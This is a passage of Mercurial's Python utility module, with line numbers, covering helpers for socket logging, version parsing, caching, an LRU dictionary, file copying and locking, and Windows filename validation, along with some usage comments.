959 959 if not self.states:
960 960 return
961 961
962 962 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
963 963
964 964 def gettimeout(self, res):
965 965 if not self.states:
966 966 return
967 967
968 968 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
969 969
970 970     def setsockopt(self, res, level, optname, value):
971 971 if not self.states:
972 972 return
973 973
974 974         self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
975 975             self.name, level, optname, value, res))
976 976
977 977 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
978 978 logdata=False, logdataapis=True):
979 979 """Turn a socket into a logging socket."""
980 980
981 981 observer = socketobserver(logh, name, reads=reads, writes=writes,
982 982 states=states, logdata=logdata,
983 983 logdataapis=logdataapis)
984 984 return socketproxy(fh, observer)
985 985
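# A hedged sketch of makeloggingsocket; 'logfh' is an assumed log file
# object. Observed calls (recv, sendall, ...) are echoed to the log:
#
#   s = socket.create_connection(('localhost', 8000))
#   s = makeloggingsocket(logfh, s, b'client', logdata=True)
#   s.sendall(b'ping')
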
986 986 def version():
987 987 """Return version information if available."""
988 988 try:
989 989 from . import __version__
990 990 return __version__.version
991 991 except ImportError:
992 992 return 'unknown'
993 993
994 994 def versiontuple(v=None, n=4):
995 995 """Parses a Mercurial version string into an N-tuple.
996 996
997 997 The version string to be parsed is specified with the ``v`` argument.
998 998 If it isn't defined, the current Mercurial version string will be parsed.
999 999
1000 1000 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1001 1001 returned values:
1002 1002
1003 1003 >>> v = b'3.6.1+190-df9b73d2d444'
1004 1004 >>> versiontuple(v, 2)
1005 1005 (3, 6)
1006 1006 >>> versiontuple(v, 3)
1007 1007 (3, 6, 1)
1008 1008 >>> versiontuple(v, 4)
1009 1009 (3, 6, 1, '190-df9b73d2d444')
1010 1010
1011 1011 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1012 1012 (3, 6, 1, '190-df9b73d2d444+20151118')
1013 1013
1014 1014 >>> v = b'3.6'
1015 1015 >>> versiontuple(v, 2)
1016 1016 (3, 6)
1017 1017 >>> versiontuple(v, 3)
1018 1018 (3, 6, None)
1019 1019 >>> versiontuple(v, 4)
1020 1020 (3, 6, None, None)
1021 1021
1022 1022 >>> v = b'3.9-rc'
1023 1023 >>> versiontuple(v, 2)
1024 1024 (3, 9)
1025 1025 >>> versiontuple(v, 3)
1026 1026 (3, 9, None)
1027 1027 >>> versiontuple(v, 4)
1028 1028 (3, 9, None, 'rc')
1029 1029
1030 1030 >>> v = b'3.9-rc+2-02a8fea4289b'
1031 1031 >>> versiontuple(v, 2)
1032 1032 (3, 9)
1033 1033 >>> versiontuple(v, 3)
1034 1034 (3, 9, None)
1035 1035 >>> versiontuple(v, 4)
1036 1036 (3, 9, None, 'rc+2-02a8fea4289b')
1037 1037 """
1038 1038 if not v:
1039 1039 v = version()
1040 1040     parts = remod.split(r'[\+-]', v, 1)
1041 1041 if len(parts) == 1:
1042 1042 vparts, extra = parts[0], None
1043 1043 else:
1044 1044 vparts, extra = parts
1045 1045
1046 1046 vints = []
1047 1047 for i in vparts.split('.'):
1048 1048 try:
1049 1049 vints.append(int(i))
1050 1050 except ValueError:
1051 1051 break
1052 1052 # (3, 6) -> (3, 6, None)
1053 1053 while len(vints) < 3:
1054 1054 vints.append(None)
1055 1055
1056 1056 if n == 2:
1057 1057 return (vints[0], vints[1])
1058 1058 if n == 3:
1059 1059 return (vints[0], vints[1], vints[2])
1060 1060 if n == 4:
1061 1061 return (vints[0], vints[1], vints[2], extra)
1062 1062
1063 1063 def cachefunc(func):
1064 1064 '''cache the result of function calls'''
1065 1065     # XXX doesn't handle keyword args
1066 1066 if func.__code__.co_argcount == 0:
1067 1067 cache = []
1068 1068 def f():
1069 1069 if len(cache) == 0:
1070 1070 cache.append(func())
1071 1071 return cache[0]
1072 1072 return f
1073 1073 cache = {}
1074 1074 if func.__code__.co_argcount == 1:
1075 1075 # we gain a small amount of time because
1076 1076 # we don't need to pack/unpack the list
1077 1077 def f(arg):
1078 1078 if arg not in cache:
1079 1079 cache[arg] = func(arg)
1080 1080 return cache[arg]
1081 1081 else:
1082 1082 def f(*args):
1083 1083 if args not in cache:
1084 1084 cache[args] = func(*args)
1085 1085 return cache[args]
1086 1086
1087 1087 return f
1088 1088
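# A minimal illustration of cachefunc: repeated calls with the same argument
# hit the cache instead of recomputing:
#
#   calls = [0]
#   def square(x):
#       calls[0] += 1
#       return x * x
#   square = cachefunc(square)
#   square(3); square(3)  # -> 9 both times, but calls[0] == 1
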
1089 1089 class cow(object):
1090 1090 """helper class to make copy-on-write easier
1091 1091
1092 1092 Call preparewrite before doing any writes.
1093 1093 """
1094 1094
1095 1095 def preparewrite(self):
1096 1096 """call this before writes, return self or a copied new object"""
1097 1097 if getattr(self, '_copied', 0):
1098 1098 self._copied -= 1
1099 1099 return self.__class__(self)
1100 1100 return self
1101 1101
1102 1102 def copy(self):
1103 1103 """always do a cheap copy"""
1104 1104 self._copied = getattr(self, '_copied', 0) + 1
1105 1105 return self
1106 1106
1107 1107 class sortdict(collections.OrderedDict):
1108 1108 '''a simple sorted dictionary
1109 1109
1110 1110 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1111 1111 >>> d2 = d1.copy()
1112 1112 >>> d2
1113 1113 sortdict([('a', 0), ('b', 1)])
1114 1114 >>> d2.update([(b'a', 2)])
1115 1115 >>> list(d2.keys()) # should still be in last-set order
1116 1116 ['b', 'a']
1117 1117 '''
1118 1118
1119 1119 def __setitem__(self, key, value):
1120 1120 if key in self:
1121 1121 del self[key]
1122 1122 super(sortdict, self).__setitem__(key, value)
1123 1123
1124 1124 if pycompat.ispypy:
1125 1125 # __setitem__() isn't called as of PyPy 5.8.0
1126 1126 def update(self, src):
1127 1127 if isinstance(src, dict):
1128 1128 src = src.iteritems()
1129 1129 for k, v in src:
1130 1130 self[k] = v
1131 1131
1132 1132 class cowdict(cow, dict):
1133 1133 """copy-on-write dict
1134 1134
1135 1135 Be sure to call d = d.preparewrite() before writing to d.
1136 1136
1137 1137 >>> a = cowdict()
1138 1138 >>> a is a.preparewrite()
1139 1139 True
1140 1140 >>> b = a.copy()
1141 1141 >>> b is a
1142 1142 True
1143 1143 >>> c = b.copy()
1144 1144 >>> c is a
1145 1145 True
1146 1146 >>> a = a.preparewrite()
1147 1147 >>> b is a
1148 1148 False
1149 1149 >>> a is a.preparewrite()
1150 1150 True
1151 1151 >>> c = c.preparewrite()
1152 1152 >>> b is c
1153 1153 False
1154 1154 >>> b is b.preparewrite()
1155 1155 True
1156 1156 """
1157 1157
1158 1158 class cowsortdict(cow, sortdict):
1159 1159 """copy-on-write sortdict
1160 1160
1161 1161 Be sure to call d = d.preparewrite() before writing to d.
1162 1162 """
1163 1163
1164 1164 class transactional(object):
1165 1165 """Base class for making a transactional type into a context manager."""
1166 1166 __metaclass__ = abc.ABCMeta
1167 1167
1168 1168 @abc.abstractmethod
1169 1169 def close(self):
1170 1170 """Successfully closes the transaction."""
1171 1171
1172 1172 @abc.abstractmethod
1173 1173 def release(self):
1174 1174 """Marks the end of the transaction.
1175 1175
1176 1176 If the transaction has not been closed, it will be aborted.
1177 1177 """
1178 1178
1179 1179 def __enter__(self):
1180 1180 return self
1181 1181
1182 1182 def __exit__(self, exc_type, exc_val, exc_tb):
1183 1183 try:
1184 1184 if exc_type is None:
1185 1185 self.close()
1186 1186 finally:
1187 1187 self.release()
1188 1188
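# A hedged sketch of a transactional subclass ('dummytr' and its bodies are
# hypothetical). As a context manager, close() runs only on success while
# release() always runs, aborting if close() was never reached:
#
#   class dummytr(transactional):
#       def close(self):
#           pass  # commit the transaction
#       def release(self):
#           pass  # roll back here if close() was not called
#
#   with dummytr():
#       updatestate()  # assumed workload
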
1189 1189 @contextlib.contextmanager
1190 1190 def acceptintervention(tr=None):
1191 1191 """A context manager that closes the transaction on InterventionRequired
1192 1192
1193 1193 If no transaction was provided, this simply runs the body and returns
1194 1194 """
1195 1195 if not tr:
1196 1196 yield
1197 1197 return
1198 1198 try:
1199 1199 yield
1200 1200 tr.close()
1201 1201 except error.InterventionRequired:
1202 1202 tr.close()
1203 1203 raise
1204 1204 finally:
1205 1205 tr.release()
1206 1206
1207 1207 @contextlib.contextmanager
1208 1208 def nullcontextmanager():
1209 1209 yield
1210 1210
1211 1211 class _lrucachenode(object):
1212 1212 """A node in a doubly linked list.
1213 1213
1214 1214 Holds a reference to nodes on either side as well as a key-value
1215 1215 pair for the dictionary entry.
1216 1216 """
1217 1217 __slots__ = (u'next', u'prev', u'key', u'value')
1218 1218
1219 1219 def __init__(self):
1220 1220 self.next = None
1221 1221 self.prev = None
1222 1222
1223 1223 self.key = _notset
1224 1224 self.value = None
1225 1225
1226 1226 def markempty(self):
1227 1227 """Mark the node as emptied."""
1228 1228 self.key = _notset
1229 1229
1230 1230 class lrucachedict(object):
1231 1231 """Dict that caches most recent accesses and sets.
1232 1232
1233 1233 The dict consists of an actual backing dict - indexed by original
1234 1234 key - and a doubly linked circular list defining the order of entries in
1235 1235 the cache.
1236 1236
1237 1237 The head node is the newest entry in the cache. If the cache is full,
1238 1238 we recycle head.prev and make it the new head. Cache accesses result in
1239 1239 the node being moved to before the existing head and being marked as the
1240 1240 new head node.
1241 1241 """
1242 1242 def __init__(self, max):
1243 1243 self._cache = {}
1244 1244
1245 1245 self._head = head = _lrucachenode()
1246 1246 head.prev = head
1247 1247 head.next = head
1248 1248 self._size = 1
1249 1249 self._capacity = max
1250 1250
1251 1251 def __len__(self):
1252 1252 return len(self._cache)
1253 1253
1254 1254 def __contains__(self, k):
1255 1255 return k in self._cache
1256 1256
1257 1257 def __iter__(self):
1258 1258 # We don't have to iterate in cache order, but why not.
1259 1259 n = self._head
1260 1260 for i in range(len(self._cache)):
1261 1261 yield n.key
1262 1262 n = n.next
1263 1263
1264 1264 def __getitem__(self, k):
1265 1265 node = self._cache[k]
1266 1266 self._movetohead(node)
1267 1267 return node.value
1268 1268
1269 1269 def __setitem__(self, k, v):
1270 1270 node = self._cache.get(k)
1271 1271 # Replace existing value and mark as newest.
1272 1272 if node is not None:
1273 1273 node.value = v
1274 1274 self._movetohead(node)
1275 1275 return
1276 1276
1277 1277 if self._size < self._capacity:
1278 1278 node = self._addcapacity()
1279 1279 else:
1280 1280 # Grab the last/oldest item.
1281 1281 node = self._head.prev
1282 1282
1283 1283 # At capacity. Kill the old entry.
1284 1284 if node.key is not _notset:
1285 1285 del self._cache[node.key]
1286 1286
1287 1287 node.key = k
1288 1288 node.value = v
1289 1289 self._cache[k] = node
1290 1290 # And mark it as newest entry. No need to adjust order since it
1291 1291 # is already self._head.prev.
1292 1292 self._head = node
1293 1293
1294 1294 def __delitem__(self, k):
1295 1295 node = self._cache.pop(k)
1296 1296 node.markempty()
1297 1297
1298 1298 # Temporarily mark as newest item before re-adjusting head to make
1299 1299 # this node the oldest item.
1300 1300 self._movetohead(node)
1301 1301 self._head = node.next
1302 1302
1303 1303 # Additional dict methods.
1304 1304
1305 1305 def get(self, k, default=None):
1306 1306 try:
1307 1307 return self._cache[k].value
1308 1308 except KeyError:
1309 1309 return default
1310 1310
1311 1311 def clear(self):
1312 1312 n = self._head
1313 1313 while n.key is not _notset:
1314 1314 n.markempty()
1315 1315 n = n.next
1316 1316
1317 1317 self._cache.clear()
1318 1318
1319 1319 def copy(self):
1320 1320 result = lrucachedict(self._capacity)
1321 1321 n = self._head.prev
1322 1322 # Iterate in oldest-to-newest order, so the copy has the right ordering
1323 1323 for i in range(len(self._cache)):
1324 1324 result[n.key] = n.value
1325 1325 n = n.prev
1326 1326 return result
1327 1327
1328 1328 def _movetohead(self, node):
1329 1329 """Mark a node as the newest, making it the new head.
1330 1330
1331 1331 When a node is accessed, it becomes the freshest entry in the LRU
1332 1332 list, which is denoted by self._head.
1333 1333
1334 1334 Visually, let's make ``N`` the new head node (* denotes head):
1335 1335
1336 1336 previous/oldest <-> head <-> next/next newest
1337 1337
1338 1338 ----<->--- A* ---<->-----
1339 1339 | |
1340 1340 E <-> D <-> N <-> C <-> B
1341 1341
1342 1342 To:
1343 1343
1344 1344 ----<->--- N* ---<->-----
1345 1345 | |
1346 1346 E <-> D <-> C <-> B <-> A
1347 1347
1348 1348 This requires the following moves:
1349 1349
1350 1350 C.next = D (node.prev.next = node.next)
1351 1351 D.prev = C (node.next.prev = node.prev)
1352 1352 E.next = N (head.prev.next = node)
1353 1353 N.prev = E (node.prev = head.prev)
1354 1354 N.next = A (node.next = head)
1355 1355 A.prev = N (head.prev = node)
1356 1356 """
1357 1357 head = self._head
1358 1358 # C.next = D
1359 1359 node.prev.next = node.next
1360 1360 # D.prev = C
1361 1361 node.next.prev = node.prev
1362 1362 # N.prev = E
1363 1363 node.prev = head.prev
1364 1364 # N.next = A
1365 1365 # It is tempting to do just "head" here, however if node is
1366 1366 # adjacent to head, this will do bad things.
1367 1367 node.next = head.prev.next
1368 1368 # E.next = N
1369 1369 node.next.prev = node
1370 1370 # A.prev = N
1371 1371 node.prev.next = node
1372 1372
1373 1373 self._head = node
1374 1374
1375 1375 def _addcapacity(self):
1376 1376 """Add a node to the circular linked list.
1377 1377
1378 1378 The new node is inserted before the head node.
1379 1379 """
1380 1380 head = self._head
1381 1381 node = _lrucachenode()
1382 1382 head.prev.next = node
1383 1383 node.prev = head.prev
1384 1384 node.next = head
1385 1385 head.prev = node
1386 1386 self._size += 1
1387 1387 return node
1388 1388
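# A small usage sketch of lrucachedict: accessing an entry refreshes it, so
# the least recently used entry is the one evicted at capacity:
#
#   d = lrucachedict(2)
#   d['a'] = 1
#   d['b'] = 2
#   d['a']      # touch 'a'; 'b' is now the oldest entry
#   d['c'] = 3  # evicts 'b'
#   'b' in d    # -> False
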
1389 1389 def lrucachefunc(func):
1390 1390 '''cache most recent results of function calls'''
1391 1391 cache = {}
1392 1392 order = collections.deque()
1393 1393 if func.__code__.co_argcount == 1:
1394 1394 def f(arg):
1395 1395 if arg not in cache:
1396 1396 if len(cache) > 20:
1397 1397 del cache[order.popleft()]
1398 1398 cache[arg] = func(arg)
1399 1399 else:
1400 1400 order.remove(arg)
1401 1401 order.append(arg)
1402 1402 return cache[arg]
1403 1403 else:
1404 1404 def f(*args):
1405 1405 if args not in cache:
1406 1406 if len(cache) > 20:
1407 1407 del cache[order.popleft()]
1408 1408 cache[args] = func(*args)
1409 1409 else:
1410 1410 order.remove(args)
1411 1411 order.append(args)
1412 1412 return cache[args]
1413 1413
1414 1414 return f
1415 1415
1416 1416 class propertycache(object):
1417 1417 def __init__(self, func):
1418 1418 self.func = func
1419 1419 self.name = func.__name__
1420 1420 def __get__(self, obj, type=None):
1421 1421 result = self.func(obj)
1422 1422 self.cachevalue(obj, result)
1423 1423 return result
1424 1424
1425 1425 def cachevalue(self, obj, value):
1426 1426 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1427 1427 obj.__dict__[self.name] = value
1428 1428
1429 1429 def clearcachedproperty(obj, prop):
1430 1430 '''clear a cached property value, if one has been set'''
1431 1431 if prop in obj.__dict__:
1432 1432 del obj.__dict__[prop]
1433 1433
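# An illustration of propertycache and clearcachedproperty ('compute' is an
# assumed expensive helper). The first access stores the result in the
# instance __dict__, shadowing the descriptor until cleared:
#
#   class thing(object):
#       @propertycache
#       def data(self):
#           return compute()
#
#   t = thing()
#   t.data                          # computed once, then served from __dict__
#   clearcachedproperty(t, 'data')  # the next access recomputes
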
1434 1434 def increasingchunks(source, min=1024, max=65536):
1435 1435 '''return no less than min bytes per chunk while data remains,
1436 1436 doubling min after each chunk until it reaches max'''
1437 1437 def log2(x):
1438 1438 if not x:
1439 1439 return 0
1440 1440 i = 0
1441 1441 while x:
1442 1442 x >>= 1
1443 1443 i += 1
1444 1444 return i - 1
1445 1445
1446 1446 buf = []
1447 1447 blen = 0
1448 1448 for chunk in source:
1449 1449 buf.append(chunk)
1450 1450 blen += len(chunk)
1451 1451 if blen >= min:
1452 1452 if min < max:
1453 1453 min = min << 1
1454 1454 nmin = 1 << log2(blen)
1455 1455 if nmin > min:
1456 1456 min = nmin
1457 1457 if min > max:
1458 1458 min = max
1459 1459 yield ''.join(buf)
1460 1460 blen = 0
1461 1461 buf = []
1462 1462 if buf:
1463 1463 yield ''.join(buf)
1464 1464
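# A worked example of increasingchunks: 4096 bytes arriving as eight 512-byte
# chunks with min=1024 and max=4096 are regrouped as 1024-, 2048- and
# 1024-byte chunks, the threshold doubling after each yield:
#
#   chunks = increasingchunks(iter([b'x' * 512] * 8), min=1024, max=4096)
#   [len(c) for c in chunks]  # -> [1024, 2048, 1024]
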
1465 1465 def always(fn):
1466 1466 return True
1467 1467
1468 1468 def never(fn):
1469 1469 return False
1470 1470
1471 1471 def nogc(func):
1472 1472 """disable garbage collector
1473 1473
1474 1474 Python's garbage collector triggers a GC each time a certain number of
1475 1475 container objects (the number being defined by gc.get_threshold()) are
1476 1476 allocated even when marked not to be tracked by the collector. Tracking has
1477 1477 no effect on when GCs are triggered, only on what objects the GC looks
1478 1478 into. As a workaround, disable GC while building complex (huge)
1479 1479 containers.
1480 1480
1481 1481     This garbage collector issue has been fixed in 2.7, but it still affects
1482 1482     CPython's performance.
1483 1483 """
1484 1484 def wrapper(*args, **kwargs):
1485 1485 gcenabled = gc.isenabled()
1486 1486 gc.disable()
1487 1487 try:
1488 1488 return func(*args, **kwargs)
1489 1489 finally:
1490 1490 if gcenabled:
1491 1491 gc.enable()
1492 1492 return wrapper
1493 1493
1494 1494 if pycompat.ispypy:
1495 1495 # PyPy runs slower with gc disabled
1496 1496 nogc = lambda x: x
1497 1497
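# A sketch of nogc as a decorator (the wrapped function is illustrative):
# the collector is disabled for the duration of the call and re-enabled
# afterwards if it was enabled before:
#
#   @nogc
#   def buildbigdict(items):
#       return dict(items)
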
1498 1498 def pathto(root, n1, n2):
1499 1499 '''return the relative path from one place to another.
1500 1500 root should use os.sep to separate directories
1501 1501 n1 should use os.sep to separate directories
1502 1502 n2 should use "/" to separate directories
1503 1503 returns an os.sep-separated path.
1504 1504
1505 1505 If n1 is a relative path, it's assumed it's
1506 1506 relative to root.
1507 1507 n2 should always be relative to root.
1508 1508 '''
1509 1509 if not n1:
1510 1510 return localpath(n2)
1511 1511 if os.path.isabs(n1):
1512 1512 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1513 1513 return os.path.join(root, localpath(n2))
1514 1514 n2 = '/'.join((pconvert(root), n2))
1515 1515 a, b = splitpath(n1), n2.split('/')
1516 1516 a.reverse()
1517 1517 b.reverse()
1518 1518 while a and b and a[-1] == b[-1]:
1519 1519 a.pop()
1520 1520 b.pop()
1521 1521 b.reverse()
1522 1522 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1523 1523
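# A worked example of pathto() with POSIX separators: going from /repo/a/b
# to the root-relative path a/c/x drops the common prefix 'a' and adds one
# '..' per remaining component of n1:
#
#   pathto(b'/repo', b'/repo/a/b', b'a/c/x')  # -> b'../c/x'
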
1524 1524 # the location of data files matching the source code
1525 1525 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1526 1526 # executable version (py2exe) doesn't support __file__
1527 1527 datapath = os.path.dirname(pycompat.sysexecutable)
1528 1528 else:
1529 1529 datapath = os.path.dirname(pycompat.fsencode(__file__))
1530 1530
1531 1531 i18n.setdatapath(datapath)
1532 1532
1533 1533 def checksignature(func):
1534 1534 '''wrap a function with code to check for calling errors'''
1535 1535 def check(*args, **kwargs):
1536 1536 try:
1537 1537 return func(*args, **kwargs)
1538 1538 except TypeError:
1539 1539 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1540 1540 raise error.SignatureError
1541 1541 raise
1542 1542
1543 1543 return check
1544 1544
1545 1545 # a whitelist of known filesystems where hardlinks work reliably
1546 1546 _hardlinkfswhitelist = {
1547 1547 'btrfs',
1548 1548 'ext2',
1549 1549 'ext3',
1550 1550 'ext4',
1551 1551 'hfs',
1552 1552 'jfs',
1553 1553 'NTFS',
1554 1554 'reiserfs',
1555 1555 'tmpfs',
1556 1556 'ufs',
1557 1557 'xfs',
1558 1558 'zfs',
1559 1559 }
1560 1560
1561 1561 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1562 1562 '''copy a file, preserving mode and optionally other stat info like
1563 1563 atime/mtime
1564 1564
1565 1565 checkambig argument is used with filestat, and is useful only if
1566 1566 destination file is guarded by any lock (e.g. repo.lock or
1567 1567 repo.wlock).
1568 1568
1569 1569 copystat and checkambig should be exclusive.
1570 1570 '''
1571 1571 assert not (copystat and checkambig)
1572 1572 oldstat = None
1573 1573 if os.path.lexists(dest):
1574 1574 if checkambig:
1575 1575 oldstat = checkambig and filestat.frompath(dest)
1576 1576 unlink(dest)
1577 1577 if hardlink:
1578 1578 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1579 1579 # unless we are confident that dest is on a whitelisted filesystem.
1580 1580 try:
1581 1581 fstype = getfstype(os.path.dirname(dest))
1582 1582 except OSError:
1583 1583 fstype = None
1584 1584 if fstype not in _hardlinkfswhitelist:
1585 1585 hardlink = False
1586 1586 if hardlink:
1587 1587 try:
1588 1588 oslink(src, dest)
1589 1589 return
1590 1590 except (IOError, OSError):
1591 1591 pass # fall back to normal copy
1592 1592 if os.path.islink(src):
1593 1593 os.symlink(os.readlink(src), dest)
1594 1594 # copytime is ignored for symlinks, but in general copytime isn't needed
1595 1595 # for them anyway
1596 1596 else:
1597 1597 try:
1598 1598 shutil.copyfile(src, dest)
1599 1599 if copystat:
1600 1600 # copystat also copies mode
1601 1601 shutil.copystat(src, dest)
1602 1602 else:
1603 1603 shutil.copymode(src, dest)
1604 1604 if oldstat and oldstat.stat:
1605 1605 newstat = filestat.frompath(dest)
1606 1606 if newstat.isambig(oldstat):
1607 1607 # stat of copied file is ambiguous to original one
1608 1608 advanced = (
1609 1609 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1610 1610 os.utime(dest, (advanced, advanced))
1611 1611 except shutil.Error as inst:
1612 1612 raise error.Abort(str(inst))
1613 1613
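# An illustrative copyfile call (paths are hypothetical): hardlinking is
# attempted only on whitelisted filesystems and silently falls back to a
# real copy on failure:
#
#   copyfile(b'.hg/store/data/foo.i', b'backup/foo.i', hardlink=True)
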
1614 1614 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1615 1615 """Copy a directory tree using hardlinks if possible."""
1616 1616 num = 0
1617 1617
1618 1618 gettopic = lambda: hardlink and _('linking') or _('copying')
1619 1619
1620 1620 if os.path.isdir(src):
1621 1621 if hardlink is None:
1622 1622 hardlink = (os.stat(src).st_dev ==
1623 1623 os.stat(os.path.dirname(dst)).st_dev)
1624 1624 topic = gettopic()
1625 1625 os.mkdir(dst)
1626 1626 for name, kind in listdir(src):
1627 1627 srcname = os.path.join(src, name)
1628 1628 dstname = os.path.join(dst, name)
1629 1629 def nprog(t, pos):
1630 1630 if pos is not None:
1631 1631 return progress(t, pos + num)
1632 1632 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1633 1633 num += n
1634 1634 else:
1635 1635 if hardlink is None:
1636 1636 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1637 1637 os.stat(os.path.dirname(dst)).st_dev)
1638 1638 topic = gettopic()
1639 1639
1640 1640 if hardlink:
1641 1641 try:
1642 1642 oslink(src, dst)
1643 1643 except (IOError, OSError):
1644 1644 hardlink = False
1645 1645 shutil.copy(src, dst)
1646 1646 else:
1647 1647 shutil.copy(src, dst)
1648 1648 num += 1
1649 1649 progress(topic, num)
1650 1650 progress(topic, None)
1651 1651
1652 1652 return hardlink, num
1653 1653
1654 1654 _winreservednames = {
1655 1655 'con', 'prn', 'aux', 'nul',
1656 1656 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1657 1657 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1658 1658 }
1659 1659 _winreservedchars = ':*?"<>|'
1660 1660 def checkwinfilename(path):
1661 1661 r'''Check that the base-relative path is a valid filename on Windows.
1662 1662 Returns None if the path is ok, or a UI string describing the problem.
1663 1663
1664 1664 >>> checkwinfilename(b"just/a/normal/path")
1665 1665 >>> checkwinfilename(b"foo/bar/con.xml")
1666 1666 "filename contains 'con', which is reserved on Windows"
1667 1667 >>> checkwinfilename(b"foo/con.xml/bar")
1668 1668 "filename contains 'con', which is reserved on Windows"
1669 1669 >>> checkwinfilename(b"foo/bar/xml.con")
1670 1670 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1671 1671 "filename contains 'AUX', which is reserved on Windows"
1672 1672 >>> checkwinfilename(b"foo/bar/bla:.txt")
1673 1673 "filename contains ':', which is reserved on Windows"
1674 1674 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1675 1675 "filename contains '\\x07', which is invalid on Windows"
1676 1676 >>> checkwinfilename(b"foo/bar/bla ")
1677 1677 "filename ends with ' ', which is not allowed on Windows"
1678 1678 >>> checkwinfilename(b"../bar")
1679 1679 >>> checkwinfilename(b"foo\\")
1680 1680 "filename ends with '\\', which is invalid on Windows"
1681 1681 >>> checkwinfilename(b"foo\\/bar")
1682 1682 "directory name ends with '\\', which is invalid on Windows"
1683 1683 '''
1684 1684 if path.endswith('\\'):
1685 1685 return _("filename ends with '\\', which is invalid on Windows")
1686 1686 if '\\/' in path:
1687 1687 return _("directory name ends with '\\', which is invalid on Windows")
1688 1688 for n in path.replace('\\', '/').split('/'):
1689 1689 if not n:
1690 1690 continue
1691 1691 for c in _filenamebytestr(n):
1692 1692 if c in _winreservedchars:
1693 1693 return _("filename contains '%s', which is reserved "
1694 1694 "on Windows") % c
1695 1695 if ord(c) <= 31:
1696 1696 return _("filename contains '%s', which is invalid "
1697 1697 "on Windows") % stringutil.escapestr(c)
1698 1698 base = n.split('.')[0]
1699 1699 if base and base.lower() in _winreservednames:
1700 1700 return _("filename contains '%s', which is reserved "
1701 1701 "on Windows") % base
1702 1702 t = n[-1:]
1703 1703 if t in '. ' and n not in '..':
1704 1704 return _("filename ends with '%s', which is not allowed "
1705 1705 "on Windows") % t
1706 1706
1707 1707 if pycompat.iswindows:
1708 1708 checkosfilename = checkwinfilename
1709 1709 timer = time.clock
1710 1710 else:
1711 1711 checkosfilename = platform.checkosfilename
1712 1712 timer = time.time
1713 1713
1714 1714 if safehasattr(time, "perf_counter"):
1715 1715 timer = time.perf_counter
1716 1716
1717 1717 def makelock(info, pathname):
1718 1718 """Create a lock file atomically if possible
1719 1719
1720 1720 This may leave a stale lock file if symlink isn't supported and signal
1721 1721 interrupt is enabled.
1722 1722 """
1723 1723 try:
1724 1724 return os.symlink(info, pathname)
1725 1725 except OSError as why:
1726 1726 if why.errno == errno.EEXIST:
1727 1727 raise
1728 1728 except AttributeError: # no symlink in os
1729 1729 pass
1730 1730
1731 1731 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1732 1732 ld = os.open(pathname, flags)
1733 1733 os.write(ld, info)
1734 1734 os.close(ld)
1735 1735
1736 1736 def readlock(pathname):
1737 1737 try:
1738 1738 return os.readlink(pathname)
1739 1739 except OSError as why:
1740 1740 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1741 1741 raise
1742 1742 except AttributeError: # no symlink in os
1743 1743 pass
1744 1744 fp = posixfile(pathname, 'rb')
1745 1745 r = fp.read()
1746 1746 fp.close()
1747 1747 return r
1748 1748
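# Illustrative round trip (arguments are hypothetical, not part of the API
# contract): makelock() stores 'info' either as a symlink target or, failing
# that, as the contents of an O_EXCL-created file, and readlock() recovers it
# through the matching fallback chain.
#
#   makelock(b'host.example.com:1234', b'.hg/store/lock')
#   readlock(b'.hg/store/lock')              # -> 'host.example.com:1234'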
1749 1749 def fstat(fp):
1750 1750 '''stat file object that may not have fileno method.'''
1751 1751 try:
1752 1752 return os.fstat(fp.fileno())
1753 1753 except AttributeError:
1754 1754 return os.stat(fp.name)
1755 1755
1756 1756 # File system features
1757 1757
1758 1758 def fscasesensitive(path):
1759 1759 """
1760 1760 Return true if the given path is on a case-sensitive filesystem
1761 1761
1762 1762 Requires a path (like /foo/.hg) ending with a foldable final
1763 1763 directory component.
1764 1764 """
1765 1765 s1 = os.lstat(path)
1766 1766 d, b = os.path.split(path)
1767 1767 b2 = b.upper()
1768 1768 if b == b2:
1769 1769 b2 = b.lower()
1770 1770 if b == b2:
1771 1771 return True # no evidence against case sensitivity
1772 1772 p2 = os.path.join(d, b2)
1773 1773 try:
1774 1774 s2 = os.lstat(p2)
1775 1775 if s2 == s1:
1776 1776 return False
1777 1777 return True
1778 1778 except OSError:
1779 1779 return True
1780 1780
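# Probe sketch for fscasesensitive (path is hypothetical): the trailing
# component must contain case-foldable characters, and a case-swapped sibling
# stat()ing to the very same result is taken as evidence of insensitivity.
#
#   fscasesensitive(b'/path/to/repo/.hg')    # True on typical Linux ext4,
#                                            # usually False on macOS/Windows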
1781 1781 try:
1782 1782 import re2
1783 1783 _re2 = None
1784 1784 except ImportError:
1785 1785 _re2 = False
1786 1786
1787 1787 class _re(object):
1788 1788 def _checkre2(self):
1789 1789 global _re2
1790 1790 try:
1791 1791 # check if match works, see issue3964
1792 1792 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1793 1793 except ImportError:
1794 1794 _re2 = False
1795 1795
1796 1796 def compile(self, pat, flags=0):
1797 1797 '''Compile a regular expression, using re2 if possible
1798 1798
1799 1799 For best performance, use only re2-compatible regexp features. The
1800 1800 only flags from the re module that are re2-compatible are
1801 1801 IGNORECASE and MULTILINE.'''
1802 1802 if _re2 is None:
1803 1803 self._checkre2()
